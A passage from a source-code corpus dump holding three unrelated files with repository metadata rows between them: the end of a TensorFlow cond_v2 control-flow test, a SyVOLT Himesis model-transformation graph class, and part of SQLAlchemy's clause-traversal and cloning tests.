return cond_v2.cond_v2(
constant_op.constant(True, name="pred"),
lambda: x,
lambda: x + 1)
x = array_ops.placeholder(shape=None, dtype=dtypes.float32)
with context.function_executor_type("SINGLE_THREADED_EXECUTOR"):
out_cond = _add_cond(x)
# The fact that sess.run() succeeds means lowering is disabled, because
# the single threaded executor does not support cond v1 ops.
sess.run(out_cond, feed_dict={x: 1.0})
@test_util.enable_control_flow_v2
def testStructuredOutputs(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(3.0, name="y")
def true_fn():
return ((x * y,), y)
def false_fn():
return ((x,), y * 3.0)
output = control_flow_ops.cond(
constant_op.constant(False), true_fn, false_fn)
self.assertEqual(self.evaluate(output[0][0]), 1.)
self.assertEqual(self.evaluate(output[1]), 9.)
@test_util.enable_control_flow_v2
@test_util.run_deprecated_v1
def testRaisesOutputStructuresMismatch(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(3.0, name="y")
def true_fn():
return x * y, y
def false_fn():
return ((x,), y * 3.0)
with self.assertRaisesRegexp(
ValueError, "Outputs of true_fn and false_fn must"
" have the same structure"):
control_flow_ops.cond(constant_op.constant(False), true_fn, false_fn)
@test_util.enable_control_flow_v2
def testCondAndTensorArray(self):
x = math_ops.range(-5, 5)
output = tensor_array_ops.TensorArray(dtype=dtypes.int32, size=x.shape[0])
def loop_body(i, output):
def if_true():
return output.write(i, x[i]**2)
def if_false():
return output.write(i, x[i])
output = control_flow_ops.cond(x[i] > 0, if_true, if_false)
return i + 1, output
_, output = control_flow_ops.while_loop(
lambda i, arr: i < x.shape[0],
loop_body,
loop_vars=(constant_op.constant(0), output))
output_t = output.stack()
self.assertAllEqual(
self.evaluate(output_t), [-5, -4, -3, -2, -1, 0, 1, 4, 9, 16])
@test_util.enable_control_flow_v2
def testCondAndTensorArrayInDefun(self):
@function.defun
def f():
x = math_ops.range(-5, 5)
output = tensor_array_ops.TensorArray(dtype=dtypes.int32, size=x.shape[0])
def loop_body(i, output):
def if_true():
return output.write(i, x[i]**2)
def if_false():
return output.write(i, x[i])
output = control_flow_ops.cond(x[i] > 0, if_true, if_false)
return i + 1, output
_, output = control_flow_ops.while_loop(
lambda i, arr: i < x.shape[0],
loop_body,
loop_vars=(constant_op.constant(0), output))
return output.stack()
output_t = f()
self.assertAllEqual(
self.evaluate(output_t), [-5, -4, -3, -2, -1, 0, 1, 4, 9, 16])
@test_util.run_deprecated_v1
def testForwardPassRewrite(self):
x = constant_op.constant(1.0, name="x")
output = cond_v2.cond_v2(constant_op.constant(True),
lambda: x * 2.0,
lambda: x)
if_op = output.op.inputs[0].op
self.assertEqual(if_op.type, "If")
# pylint: disable=g-deprecated-assert
self.assertEqual(len(if_op.outputs), 1)
gradients_impl.gradients(output, x)
# if_op should have been rewritten to output 2.0 intermediate.
self.assertEqual(len(if_op.outputs), 2)
gradients_impl.gradients(output, x)
# Computing the gradient again shouldn't rewrite if_op again.
self.assertEqual(len(if_op.outputs), 2)
# pylint: enable=g-deprecated-assert
class CondV2CollectionTest(test.TestCase):
def testCollectionIntValueAccessInCond(self):
"""Read values from graph collections inside of cond_v2."""
with ops.Graph().as_default() as g:
with self.session(graph=g):
x = 2
y = 5
ops.add_to_collection("x", x)
ops.add_to_collection("y", y)
def fn():
x_const = constant_op.constant(ops.get_collection("x")[0])
y_const = constant_op.constant(ops.get_collection("y")[0])
return math_ops.add(x_const, y_const)
cnd = cond_v2.cond_v2(constant_op.constant(True), fn, fn)
self.assertEquals(cnd.eval(), 7)
def testCollectionTensorValueAccessInCond(self):
"""Read tensors from collections inside of cond_v2 & use them."""
with ops.Graph().as_default() as g:
with self.session(graph=g):
x = constant_op.constant(2)
y = constant_op.constant(5)
ops.add_to_collection("x", x)
ops.add_to_collection("y", y)
def fn():
x_read = ops.get_collection("x")[0]
y_read = ops.get_collection("y")[0]
return math_ops.add(x_read, y_read)
cnd = cond_v2.cond_v2(math_ops.less(x, y), fn, fn)
self.assertEquals(cnd.eval(), 7)
def testCollectionIntValueWriteInCond(self):
"""Make sure Int writes to collections work inside of cond_v2."""
with ops.Graph().as_default() as g:
with self.session(graph=g):
x = constant_op.constant(2)
y = constant_op.constant(5)
def true_fn():
z = math_ops.add(x, y)
ops.add_to_collection("z", 7)
return math_ops.mul(x, z)
def false_fn():
z = math_ops.add(x, y)
return math_ops.mul(x, z)
cnd = cond_v2.cond_v2(constant_op.constant(True), true_fn, false_fn)
self.assertEquals(cnd.eval(), 14)
read_z_collection = ops.get_collection("z")
self.assertEquals(read_z_collection, [7])
class CondV2ContainerTest(test.TestCase):
def testContainer(self):
"""Set containers outside & inside of cond_v2.
Make sure the containers are set correctly for both variable creation
(tested by variables.Variable) and for stateful ops (tested by FIFOQueue)
"""
self.skipTest("b/113048653")
with ops.Graph().as_default() as g:
with self.session(graph=g):
v0 = variables.Variable([0])
q0 = data_flow_ops.FIFOQueue(1, dtypes.float32)
def container(node):
return node.op.get_attr("container")
self.assertEqual(compat.as_bytes(""), container(v0))
self.assertEqual(compat.as_bytes(""), container(q0.queue_ref))
def true_fn():
# When this branch is created in cond below,
# the container should begin with 'l1'
v1 = variables.Variable([1])
q1 = data_flow_ops.FIFOQueue(1, dtypes.float32)
with ops.container("l2t"):
v2 = variables.Variable([2])
q2 = data_flow_ops.FIFOQueue(1, dtypes.float32)
v3 = variables.Variable([1])
q3 = data_flow_ops.FIFOQueue(1, dtypes.float32)
self.assertEqual(compat.as_bytes("l1"), container(v1))
self.assertEqual(compat.as_bytes("l1"), container(q1.queue_ref))
self.assertEqual(compat.as_bytes("l2t"), container(v2))
self.assertEqual(compat.as_bytes("l2t"), container(q2.queue_ref))
self.assertEqual(compat.as_bytes("l1"), container(v3))
self.assertEqual(compat.as_bytes("l1"), container(q3.queue_ref))
return constant_op.constant(2.0)
def false_fn():
# When this branch is created in cond below,
# the container should begin with 'l1'
v1 = variables.Variable([1])
q1 = data_flow_ops.FIFOQueue(1, dtypes.float32)
with ops.container("l2f"):
v2 = variables.Variable([2])
q2 = data_flow_ops.FIFOQueue(1, dtypes.float32)
v3 = variables.Variable([1])
q3 = data_flow_ops.FIFOQueue(1, dtypes.float32)
self.assertEqual(compat.as_bytes("l1"), container(v1))
self.assertEqual(compat.as_bytes("l1"), container(q1.queue_ref))
self.assertEqual(compat.as_bytes("l2f"), container(v2))
self.assertEqual(compat.as_bytes("l2f"), container(q2.queue_ref))
self.assertEqual(compat.as_bytes("l1"), container(v3))
self.assertEqual(compat.as_bytes("l1"), container(q3.queue_ref))
return constant_op.constant(6.0)
with ops.container("l1"):
cnd_true = cond_v2.cond_v2(
constant_op.constant(True), true_fn, false_fn)
self.assertEquals(cnd_true.eval(), 2)
cnd_false = cond_v2.cond_v2(
constant_op.constant(False), true_fn, false_fn)
self.assertEquals(cnd_false.eval(), 6)
v4 = variables.Variable([3])
q4 = data_flow_ops.FIFOQueue(1, dtypes.float32)
v5 = variables.Variable([4])
q5 = data_flow_ops.FIFOQueue(1, dtypes.float32)
self.assertEqual(compat.as_bytes("l1"), container(v4))
self.assertEqual(compat.as_bytes("l1"), container(q4.queue_ref))
self.assertEqual(compat.as_bytes(""), container(v5))
self.assertEqual(compat.as_bytes(""), container(q5.queue_ref))
class CondV2ColocationGroupAndDeviceTest(test.TestCase):
def testColocateWithBeforeCond(self):
with ops.Graph().as_default() as g:
with self.session(graph=g):
a = constant_op.constant([2.0], name="a")
b = constant_op.constant([2.0], name="b")
def fn():
c = constant_op.constant(3.0)
self.assertEqual([b"loc:@a"], c.op.colocation_groups())
return c
with ops.colocate_with(a.op):
self.assertEquals(
cond_v2.cond_v2(constant_op.constant(True), fn, fn).eval(), 3)
def fn2():
c = constant_op.constant(3.0)
self.assertEqual([b"loc:@a", b"loc:@b"], c.op.colocation_groups())
return c
with ops.colocate_with(a.op):
with ops.colocate_with(b.op):
self.assertEquals(
cond_v2.cond_v2(constant_op.constant(True), fn2, fn2).eval(), 3)
def testColocateWithInAndOutOfCond(self):
with ops.Graph().as_default() as g:
with self.session(graph=g):
a = constant_op.constant([2.0], name="a")
b = constant_op.constant([2.0], name="b")
def fn2():
with ops.colocate_with(b.op):
c = constant_op.constant(3.0)
self.assertEqual([b"loc:@a", b"loc:@b"], c.op.colocation_groups())
return c
with ops.colocate_with(a.op):
self.assertEquals(
cond_v2.cond_v2(constant_op.constant(True), fn2, fn2).eval(), 3)
d = constant_op.constant([2.0], name="d")
self.assertEqual([b"loc:@a"], d.op.colocation_groups())
def testColocateWithInCondGraphPartitioning(self):
with ops.Graph().as_default() as g:
with self.session(
graph=g,
config=config_pb2.ConfigProto(device_count={"CPU": 2})
) as sess:
with ops.device("/device:CPU:0"):
a = constant_op.constant([2.0], name="a")
with ops.device("/device:CPU:1"):
b = constant_op.constant([2.0], name="b")
def fn():
with ops.colocate_with(b.op):
c = math_ops.add(a, a, name="c")
return c
out_cond_2 = cond_v2.cond_v2(constant_op.constant(True), fn, fn)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
run_metadata = config_pb2.RunMetadata()
sess.run(out_cond_2, options=run_options, run_metadata=run_metadata)
# We expect there to be two partitions because of the
# colocate_with. We are only running the cond, which has a data
# dependency on `a` but not on `b`. So, without the colocate_with
# we would expect execution on just one device.
self.assertTrue(len(run_metadata.partition_graphs) >= 2)
def testDeviceBeforeCond(self):
with ops.Graph().as_default() as g:
with self.session(graph=g):
def fn():
self.assertEqual("", constant_op.constant(3.0).op.device)
return test_ops.device_placement_op()
with ops.device("/device:CPU:0"):
self.assertIn(
compat.as_bytes("CPU:0"),
self.evaluate(cond_v2.cond_v2(constant_op.constant(True),
fn, fn)))
def fn2():
self.assertEqual("", constant_op.constant(3.0).op.device)
return test_ops.device_placement_op()
if test_util.is_gpu_available():
with ops.device("/device:GPU:0"):
self.assertIn(
compat.as_bytes("GPU:0"),
self.evaluate(cond_v2.cond_v2(constant_op.constant(True),
fn2, fn2)))
else:
self.skipTest("Test requrires a GPU to check GPU device placement.")
def testDeviceInAndOutOfCond(self):
with ops.Graph().as_default() as g:
with self.session(
graph=g, config=config_pb2.ConfigProto(device_count={"CPU": 2})):
def fn2():
with ops.device("/device:CPU:1"):
c = constant_op.constant(3.0)
self.assertEqual("/device:CPU:1", c.op.device)
return c
with ops.device("/device:CPU:0"):
self.assertEquals(
cond_v2.cond_v2(constant_op.constant(True), fn2, fn2).eval(), 3)
d = constant_op.constant(4.0)
self.assertEqual("/device:CPU:0", d.op.device)
def testDeviceInCondGraphPartitioning(self):
with ops.Graph().as_default() as g:
with self.session(
graph=g,
config=config_pb2.ConfigProto(device_count={"CPU": 2})
) as sess:
def fn():
with ops.device("/device:CPU:1"):
c = math_ops.add(a, a, name="c")
return c
with ops.device("/device:CPU:0"):
a = constant_op.constant([2.0], name="a")
out_cond_2 = cond_v2.cond_v2(constant_op.constant(True), fn, fn)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
run_metadata = config_pb2.RunMetadata()
sess.run(out_cond_2, options=run_options, run_metadata=run_metadata)
self.assertTrue(len(run_metadata.partition_graphs) >= 2)
def _cond(pred, true_fn, false_fn, name):
if _is_old_cond():
return control_flow_ops.cond(pred, true_fn, false_fn, name=name)
else:
return cond_v2.cond_v2(pred, true_fn, false_fn, name=name)
def _is_old_cond():
return isinstance(ops.get_default_graph()._get_control_flow_context(),
control_flow_ops.CondContext)
if __name__ == "__main__":
test.main()
| apache-2.0 | 3,045,569,778,192,330,000 | 31.249318 | 80 | 0.587834 | false |
levilucio/SyVOLT | ECore_Copier_MM/transformation-Large/HeattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType.py | 1 | 5089 |
from core.himesis import Himesis
class HeattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType(Himesis):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HeattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HeattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType, self).__init__(name='HeattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType', num_nodes=27, edges=[])
# Add the edges
self.add_edges([[0, 6], [6, 5], [0, 8], [8, 7], [1, 10], [10, 9], [1, 12], [12, 11], [5, 3], [3, 7], [9, 4], [4, 11], [9, 13], [13, 5], [11, 14], [14, 7], [9, 15], [15, 16], [17, 18], [18, 16], [17, 19], [19, 20], [11, 21], [21, 22], [23, 24], [24, 22], [23, 25], [25, 26], [0, 2], [2, 1]])
# Set the graph attributes
self["mm__"] = ['HimesisMM']
self["name"] = """eattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType"""
self["GUID__"] = 7500290523339363630
# Set the node attributes
self.vs[0]["mm__"] = """MatchModel"""
self.vs[0]["GUID__"] = 3345355481358239434
self.vs[1]["mm__"] = """ApplyModel"""
self.vs[1]["GUID__"] = 2661112097501954342
self.vs[2]["mm__"] = """paired_with"""
self.vs[2]["GUID__"] = 2884002363878182308
self.vs[3]["associationType"] = """eGenericType"""
self.vs[3]["mm__"] = """directLink_S"""
self.vs[3]["GUID__"] = 3237503427209923934
self.vs[4]["associationType"] = """eGenericType"""
self.vs[4]["mm__"] = """directLink_T"""
self.vs[4]["GUID__"] = 3487447824061178971
self.vs[5]["name"] = """"""
self.vs[5]["classtype"] = """EAttribute"""
self.vs[5]["mm__"] = """EAttribute"""
self.vs[5]["cardinality"] = """+"""
self.vs[5]["GUID__"] = 180383522542507929
self.vs[6]["mm__"] = """match_contains"""
self.vs[6]["GUID__"] = 9029141784669719181
self.vs[7]["name"] = """"""
self.vs[7]["classtype"] = """EGenericType"""
self.vs[7]["mm__"] = """EGenericType"""
self.vs[7]["cardinality"] = """+"""
self.vs[7]["GUID__"] = 705924063494009604
self.vs[8]["mm__"] = """match_contains"""
self.vs[8]["GUID__"] = 5107917165971943200
self.vs[9]["name"] = """"""
self.vs[9]["classtype"] = """EAttribute"""
self.vs[9]["mm__"] = """EAttribute"""
self.vs[9]["cardinality"] = """1"""
self.vs[9]["GUID__"] = 8056650007601953622
self.vs[10]["mm__"] = """apply_contains"""
self.vs[10]["GUID__"] = 8334363595364440411
self.vs[11]["name"] = """"""
self.vs[11]["classtype"] = """EGenericType"""
self.vs[11]["mm__"] = """EGenericType"""
self.vs[11]["cardinality"] = """1"""
self.vs[11]["GUID__"] = 638205883689070586
self.vs[12]["mm__"] = """apply_contains"""
self.vs[12]["GUID__"] = 5247899703763388228
self.vs[13]["mm__"] = """backward_link"""
self.vs[13]["type"] = """ruleDef"""
self.vs[13]["GUID__"] = 9152985125860709070
self.vs[14]["mm__"] = """backward_link"""
self.vs[14]["type"] = """ruleDef"""
self.vs[14]["GUID__"] = 8939660675905724386
self.vs[15]["mm__"] = """hasAttribute_T"""
self.vs[15]["GUID__"] = 4724550716111922994
self.vs[16]["name"] = """ApplyAttribute"""
self.vs[16]["Type"] = """'String'"""
self.vs[16]["mm__"] = """Attribute"""
self.vs[16]["GUID__"] = 6342963225845912724
self.vs[17]["name"] = """eq_"""
self.vs[17]["mm__"] = """Equation"""
self.vs[17]["GUID__"] = 8425545405611867446
self.vs[18]["mm__"] = """leftExpr"""
self.vs[18]["GUID__"] = 2510594769584959828
self.vs[19]["mm__"] = """rightExpr"""
self.vs[19]["GUID__"] = 2091737926535973939
self.vs[20]["name"] = """solveRef"""
self.vs[20]["Type"] = """'String'"""
self.vs[20]["mm__"] = """Constant"""
self.vs[20]["GUID__"] = 8569331947771768572
self.vs[21]["mm__"] = """hasAttribute_T"""
self.vs[21]["GUID__"] = 684785101581142767
self.vs[22]["name"] = """ApplyAttribute"""
self.vs[22]["Type"] = """'String'"""
self.vs[22]["mm__"] = """Attribute"""
self.vs[22]["GUID__"] = 9082076936603064885
self.vs[23]["name"] = """eq_"""
self.vs[23]["mm__"] = """Equation"""
self.vs[23]["GUID__"] = 4941466305534700405
self.vs[24]["mm__"] = """leftExpr"""
self.vs[24]["GUID__"] = 2426201971054401358
self.vs[25]["mm__"] = """rightExpr"""
self.vs[25]["GUID__"] = 4495076672642341780
self.vs[26]["name"] = """solveRef"""
self.vs[26]["Type"] = """'String'"""
self.vs[26]["mm__"] = """Constant"""
self.vs[26]["GUID__"] = 7828040183483422309
| mit | 4,146,659,116,746,106,400 | 48.407767 | 298 | 0.523875 | false |
Abi1ity/uniclust2.0 | SQLAlchemy-0.9.9/test/sql/test_generative.py | 1 | 58459 | from sqlalchemy.sql import table, column, ClauseElement, operators
from sqlalchemy.sql.expression import _clone, _from_objects
from sqlalchemy import func, select, Integer, Table, \
Column, MetaData, extract, String, bindparam, tuple_, and_, union, text,\
case, ForeignKey, literal_column
from sqlalchemy.testing import fixtures, AssertsExecutionResults, \
AssertsCompiledSQL
from sqlalchemy import testing
from sqlalchemy.sql.visitors import ClauseVisitor, CloningVisitor, \
cloned_traverse, ReplacingCloningVisitor
from sqlalchemy import exc
from sqlalchemy.sql import util as sql_util
from sqlalchemy.testing import eq_, is_, assert_raises, assert_raises_message
A = B = t1 = t2 = t3 = table1 = table2 = table3 = table4 = None
class TraversalTest(fixtures.TestBase, AssertsExecutionResults):
"""test ClauseVisitor's traversal, particularly its
ability to copy and modify a ClauseElement in place."""
@classmethod
def setup_class(cls):
global A, B
# establish two fictitious ClauseElements.
# define deep equality semantics as well as deep
# identity semantics.
class A(ClauseElement):
__visit_name__ = 'a'
def __init__(self, expr):
self.expr = expr
def is_other(self, other):
return other is self
__hash__ = ClauseElement.__hash__
def __eq__(self, other):
return other.expr == self.expr
def __ne__(self, other):
return other.expr != self.expr
def __str__(self):
return "A(%s)" % repr(self.expr)
class B(ClauseElement):
__visit_name__ = 'b'
def __init__(self, *items):
self.items = items
def is_other(self, other):
if other is not self:
return False
for i1, i2 in zip(self.items, other.items):
if i1 is not i2:
return False
return True
__hash__ = ClauseElement.__hash__
def __eq__(self, other):
for i1, i2 in zip(self.items, other.items):
if i1 != i2:
return False
return True
def __ne__(self, other):
for i1, i2 in zip(self.items, other.items):
if i1 != i2:
return True
return False
def _copy_internals(self, clone=_clone):
self.items = [clone(i) for i in self.items]
def get_children(self, **kwargs):
return self.items
def __str__(self):
return "B(%s)" % repr([str(i) for i in self.items])
def test_test_classes(self):
a1 = A("expr1")
struct = B(a1, A("expr2"), B(A("expr1b"), A("expr2b")), A("expr3"))
struct2 = B(a1, A("expr2"), B(A("expr1b"), A("expr2b")), A("expr3"))
struct3 = B(a1, A("expr2"), B(A("expr1b"),
A("expr2bmodified")), A("expr3"))
assert a1.is_other(a1)
assert struct.is_other(struct)
assert struct == struct2
assert struct != struct3
assert not struct.is_other(struct2)
assert not struct.is_other(struct3)
def test_clone(self):
struct = B(A("expr1"), A("expr2"), B(A("expr1b"),
A("expr2b")), A("expr3"))
class Vis(CloningVisitor):
def visit_a(self, a):
pass
def visit_b(self, b):
pass
vis = Vis()
s2 = vis.traverse(struct)
assert struct == s2
assert not struct.is_other(s2)
def test_no_clone(self):
struct = B(A("expr1"), A("expr2"), B(A("expr1b"),
A("expr2b")), A("expr3"))
class Vis(ClauseVisitor):
def visit_a(self, a):
pass
def visit_b(self, b):
pass
vis = Vis()
s2 = vis.traverse(struct)
assert struct == s2
assert struct.is_other(s2)
def test_clone_anon_label(self):
from sqlalchemy.sql.elements import Grouping
c1 = Grouping(literal_column('q'))
s1 = select([c1])
class Vis(CloningVisitor):
def visit_grouping(self, elem):
pass
vis = Vis()
s2 = vis.traverse(s1)
eq_(list(s2.inner_columns)[0].anon_label, c1.anon_label)
def test_change_in_place(self):
struct = B(A("expr1"), A("expr2"), B(A("expr1b"),
A("expr2b")), A("expr3"))
struct2 = B(A("expr1"), A("expr2modified"), B(A("expr1b"),
A("expr2b")), A("expr3"))
struct3 = B(A("expr1"), A("expr2"), B(A("expr1b"),
A("expr2bmodified")), A("expr3"))
class Vis(CloningVisitor):
def visit_a(self, a):
if a.expr == "expr2":
a.expr = "expr2modified"
def visit_b(self, b):
pass
vis = Vis()
s2 = vis.traverse(struct)
assert struct != s2
assert not struct.is_other(s2)
assert struct2 == s2
class Vis2(CloningVisitor):
def visit_a(self, a):
if a.expr == "expr2b":
a.expr = "expr2bmodified"
def visit_b(self, b):
pass
vis2 = Vis2()
s3 = vis2.traverse(struct)
assert struct != s3
assert struct3 == s3
def test_visit_name(self):
# override fns in testlib/schema.py
from sqlalchemy import Column
class CustomObj(Column):
pass
assert CustomObj.__visit_name__ == Column.__visit_name__ == 'column'
foo, bar = CustomObj('foo', String), CustomObj('bar', String)
bin = foo == bar
set(ClauseVisitor().iterate(bin))
assert set(ClauseVisitor().iterate(bin)) == set([foo, bar, bin])
class BinaryEndpointTraversalTest(fixtures.TestBase):
"""test the special binary product visit"""
def _assert_traversal(self, expr, expected):
canary = []
def visit(binary, l, r):
canary.append((binary.operator, l, r))
print(binary.operator, l, r)
sql_util.visit_binary_product(visit, expr)
eq_(
canary, expected
)
def test_basic(self):
a, b = column("a"), column("b")
self._assert_traversal(
a == b,
[
(operators.eq, a, b)
]
)
def test_with_tuples(self):
a, b, c, d, b1, b1a, b1b, e, f = (
column("a"),
column("b"),
column("c"),
column("d"),
column("b1"),
column("b1a"),
column("b1b"),
column("e"),
column("f")
)
expr = tuple_(
a, b, b1 == tuple_(b1a, b1b == d), c
) > tuple_(
func.go(e + f)
)
self._assert_traversal(
expr,
[
(operators.gt, a, e),
(operators.gt, a, f),
(operators.gt, b, e),
(operators.gt, b, f),
(operators.eq, b1, b1a),
(operators.eq, b1b, d),
(operators.gt, c, e),
(operators.gt, c, f)
]
)
def test_composed(self):
a, b, e, f, q, j, r = (
column("a"),
column("b"),
column("e"),
column("f"),
column("q"),
column("j"),
column("r"),
)
expr = and_(
(a + b) == q + func.sum(e + f),
and_(
j == r,
f == q
)
)
self._assert_traversal(
expr,
[
(operators.eq, a, q),
(operators.eq, a, e),
(operators.eq, a, f),
(operators.eq, b, q),
(operators.eq, b, e),
(operators.eq, b, f),
(operators.eq, j, r),
(operators.eq, f, q),
]
)
def test_subquery(self):
a, b, c = column("a"), column("b"), column("c")
subq = select([c]).where(c == a).as_scalar()
expr = and_(a == b, b == subq)
self._assert_traversal(
expr,
[
(operators.eq, a, b),
(operators.eq, b, subq),
]
)
class ClauseTest(fixtures.TestBase, AssertsCompiledSQL):
"""test copy-in-place behavior of various ClauseElements."""
__dialect__ = 'default'
@classmethod
def setup_class(cls):
global t1, t2, t3
t1 = table("table1",
column("col1"),
column("col2"),
column("col3"),
)
t2 = table("table2",
column("col1"),
column("col2"),
column("col3"),
)
t3 = Table('table3', MetaData(),
Column('col1', Integer),
Column('col2', Integer)
)
def test_binary(self):
clause = t1.c.col2 == t2.c.col2
eq_(str(clause), str(CloningVisitor().traverse(clause)))
def test_binary_anon_label_quirk(self):
t = table('t1', column('col1'))
f = t.c.col1 * 5
self.assert_compile(select([f]),
"SELECT t1.col1 * :col1_1 AS anon_1 FROM t1")
f.anon_label
a = t.alias()
f = sql_util.ClauseAdapter(a).traverse(f)
self.assert_compile(
select(
[f]),
"SELECT t1_1.col1 * :col1_1 AS anon_1 FROM t1 AS t1_1")
def test_join(self):
clause = t1.join(t2, t1.c.col2 == t2.c.col2)
c1 = str(clause)
assert str(clause) == str(CloningVisitor().traverse(clause))
class Vis(CloningVisitor):
def visit_binary(self, binary):
binary.right = t2.c.col3
clause2 = Vis().traverse(clause)
assert c1 == str(clause)
assert str(clause2) == str(t1.join(t2, t1.c.col2 == t2.c.col3))
def test_aliased_column_adapt(self):
clause = t1.select()
aliased = t1.select().alias()
aliased2 = t1.alias()
adapter = sql_util.ColumnAdapter(aliased)
f = select([
adapter.columns[c]
for c in aliased2.c
]).select_from(aliased)
s = select([aliased2]).select_from(aliased)
eq_(str(s), str(f))
f = select([
adapter.columns[func.count(aliased2.c.col1)]
]).select_from(aliased)
eq_(
str(select([func.count(aliased2.c.col1)]).select_from(aliased)),
str(f)
)
def test_aliased_cloned_column_adapt_inner(self):
clause = select([t1.c.col1, func.foo(t1.c.col2).label('foo')])
aliased1 = select([clause.c.col1, clause.c.foo])
aliased2 = clause
aliased2.c.col1, aliased2.c.foo
aliased3 = cloned_traverse(aliased2, {}, {})
# fixed by [ticket:2419]. the inside columns
# on aliased3 have _is_clone_of pointers to those of
# aliased2. corresponding_column checks these
# now.
adapter = sql_util.ColumnAdapter(aliased1)
f1 = select([
adapter.columns[c]
for c in aliased2._raw_columns
])
f2 = select([
adapter.columns[c]
for c in aliased3._raw_columns
])
eq_(
str(f1), str(f2)
)
def test_aliased_cloned_column_adapt_exported(self):
clause = select([t1.c.col1, func.foo(t1.c.col2).label('foo')])
aliased1 = select([clause.c.col1, clause.c.foo])
aliased2 = clause
aliased2.c.col1, aliased2.c.foo
aliased3 = cloned_traverse(aliased2, {}, {})
# also fixed by [ticket:2419]. When we look at the
# *outside* columns of aliased3, they previously did not
# have an _is_clone_of pointer. But we now modified _make_proxy
# to assign this.
adapter = sql_util.ColumnAdapter(aliased1)
f1 = select([
adapter.columns[c]
for c in aliased2.c
])
f2 = select([
adapter.columns[c]
for c in aliased3.c
])
eq_(
str(f1), str(f2)
)
def test_aliased_cloned_schema_column_adapt_exported(self):
clause = select([t3.c.col1, func.foo(t3.c.col2).label('foo')])
aliased1 = select([clause.c.col1, clause.c.foo])
aliased2 = clause
aliased2.c.col1, aliased2.c.foo
aliased3 = cloned_traverse(aliased2, {}, {})
# also fixed by [ticket:2419]. When we look at the
# *outside* columns of aliased3, they previously did not
# have an _is_clone_of pointer. But we now modified _make_proxy
# to assign this.
adapter = sql_util.ColumnAdapter(aliased1)
f1 = select([
adapter.columns[c]
for c in aliased2.c
])
f2 = select([
adapter.columns[c]
for c in aliased3.c
])
eq_(
str(f1), str(f2)
)
def test_text(self):
clause = text(
"select * from table where foo=:bar",
bindparams=[bindparam('bar')])
c1 = str(clause)
class Vis(CloningVisitor):
def visit_textclause(self, text):
text.text = text.text + " SOME MODIFIER=:lala"
text._bindparams['lala'] = bindparam('lala')
clause2 = Vis().traverse(clause)
assert c1 == str(clause)
assert str(clause2) == c1 + " SOME MODIFIER=:lala"
assert list(clause._bindparams.keys()) == ['bar']
assert set(clause2._bindparams.keys()) == set(['bar', 'lala'])
def test_select(self):
s2 = select([t1])
s2_assert = str(s2)
s3_assert = str(select([t1], t1.c.col2 == 7))
class Vis(CloningVisitor):
def visit_select(self, select):
select.append_whereclause(t1.c.col2 == 7)
s3 = Vis().traverse(s2)
assert str(s3) == s3_assert
assert str(s2) == s2_assert
print(str(s2))
print(str(s3))
class Vis(ClauseVisitor):
def visit_select(self, select):
select.append_whereclause(t1.c.col2 == 7)
Vis().traverse(s2)
assert str(s2) == s3_assert
s4_assert = str(select([t1], and_(t1.c.col2 == 7, t1.c.col3 == 9)))
class Vis(CloningVisitor):
def visit_select(self, select):
select.append_whereclause(t1.c.col3 == 9)
s4 = Vis().traverse(s3)
print(str(s3))
print(str(s4))
assert str(s4) == s4_assert
assert str(s3) == s3_assert
s5_assert = str(select([t1], and_(t1.c.col2 == 7, t1.c.col1 == 9)))
class Vis(CloningVisitor):
def visit_binary(self, binary):
if binary.left is t1.c.col3:
binary.left = t1.c.col1
binary.right = bindparam("col1", unique=True)
s5 = Vis().traverse(s4)
print(str(s4))
print(str(s5))
assert str(s5) == s5_assert
assert str(s4) == s4_assert
def test_union(self):
u = union(t1.select(), t2.select())
u2 = CloningVisitor().traverse(u)
assert str(u) == str(u2)
assert [str(c) for c in u2.c] == [str(c) for c in u.c]
u = union(t1.select(), t2.select())
cols = [str(c) for c in u.c]
u2 = CloningVisitor().traverse(u)
assert str(u) == str(u2)
assert [str(c) for c in u2.c] == cols
s1 = select([t1], t1.c.col1 == bindparam('id_param'))
s2 = select([t2])
u = union(s1, s2)
u2 = u.params(id_param=7)
u3 = u.params(id_param=10)
assert str(u) == str(u2) == str(u3)
assert u2.compile().params == {'id_param': 7}
assert u3.compile().params == {'id_param': 10}
def test_in(self):
expr = t1.c.col1.in_(['foo', 'bar'])
expr2 = CloningVisitor().traverse(expr)
assert str(expr) == str(expr2)
def test_over(self):
expr = func.row_number().over(order_by=t1.c.col1)
expr2 = CloningVisitor().traverse(expr)
assert str(expr) == str(expr2)
def test_adapt_union(self):
u = union(
t1.select().where(t1.c.col1 == 4),
t1.select().where(t1.c.col1 == 5)
).alias()
assert sql_util.ClauseAdapter(u).traverse(t1) is u
def test_binds(self):
"""test that unique bindparams change their name upon clone()
to prevent conflicts"""
s = select([t1], t1.c.col1 == bindparam(None, unique=True)).alias()
s2 = CloningVisitor().traverse(s).alias()
s3 = select([s], s.c.col2 == s2.c.col2)
self.assert_compile(
s3, "SELECT anon_1.col1, anon_1.col2, anon_1.col3 FROM "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, "
"table1.col3 AS col3 FROM table1 WHERE table1.col1 = :param_1) "
"AS anon_1, "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, table1.col3 "
"AS col3 FROM table1 WHERE table1.col1 = :param_2) AS anon_2 "
"WHERE anon_1.col2 = anon_2.col2")
s = select([t1], t1.c.col1 == 4).alias()
s2 = CloningVisitor().traverse(s).alias()
s3 = select([s], s.c.col2 == s2.c.col2)
self.assert_compile(
s3, "SELECT anon_1.col1, anon_1.col2, anon_1.col3 FROM "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, "
"table1.col3 AS col3 FROM table1 WHERE table1.col1 = :col1_1) "
"AS anon_1, "
"(SELECT table1.col1 AS col1, table1.col2 AS col2, table1.col3 "
"AS col3 FROM table1 WHERE table1.col1 = :col1_2) AS anon_2 "
"WHERE anon_1.col2 = anon_2.col2")
